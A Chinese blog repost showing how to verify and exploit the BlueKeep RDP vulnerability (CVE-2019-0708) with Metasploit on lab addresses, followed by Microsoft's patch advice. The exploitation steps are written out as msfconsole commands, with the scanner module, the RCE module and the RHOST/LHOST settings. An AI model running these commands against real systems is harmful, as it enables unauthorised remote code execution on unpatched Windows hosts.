我是靠谱客的博主 心灵美冰棍,这篇文章主要介绍使用msf验证Microsoft RDP RCE (CVE-2019-0708)漏洞1. 工具2. 利用过程3. 修复,现在分享给大家,希望可以做个参考。

1. 工具

        Msfconsole

2. 利用过程

2.1 启动msf

复制代码
1
root@kali:~# msfconsole

2.2 搜索0708

复制代码
1
msf5 > search 0708

2.3 测试主机是否存在0708漏洞

复制代码
1
2
3
msf5 > use auxiliary/scanner/rdp/cve_2019_0708_bluekeep msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set RHOSTS 192.168.56.101 msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > exploit

2.4 利用

复制代码
1
msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

2.5 设置payload

复制代码
1
2
3
set RHOST 192.168.56.101 set LHOST192.168.56.102 set target 1

2.6 执行渗透(有成功概率)

复制代码
1
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit

2.7 结果

3. 修复

        Microsoft 意识到有些客户正在运行不再获得主流支持的 Windows 版本。 这意味着这些客户将不会收到任何安全更新来保护他们的系统免遭 CVE-2019-0708(这是一个严重的远程执行代码漏洞)的攻击。

        鉴于对客户及其业务的潜在影响,我们决定为不再获得主流支持的平台提供安全更新(请参阅下表中的下载链接)。 这些更新仅通过 Microsoft 更新目录提供。 我们建议运行以下操作系统之一的客户尽快下载并安装此更新。

补丁下载链接:CVE-2019-0708 的客户指南 | 远程桌面服务远程执行代码漏洞:2019 年 5 月 14 日

最后

以上就是心灵美冰棍最近收集整理的关于使用msf验证Microsoft RDP RCE (CVE-2019-0708)漏洞1. 工具2. 利用过程3. 修复的全部内容,更多相关使用msf验证Microsoft内容请搜索靠谱客的其他文章。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(102)

评论列表共有 0 条评论

立即
投稿
返回
顶部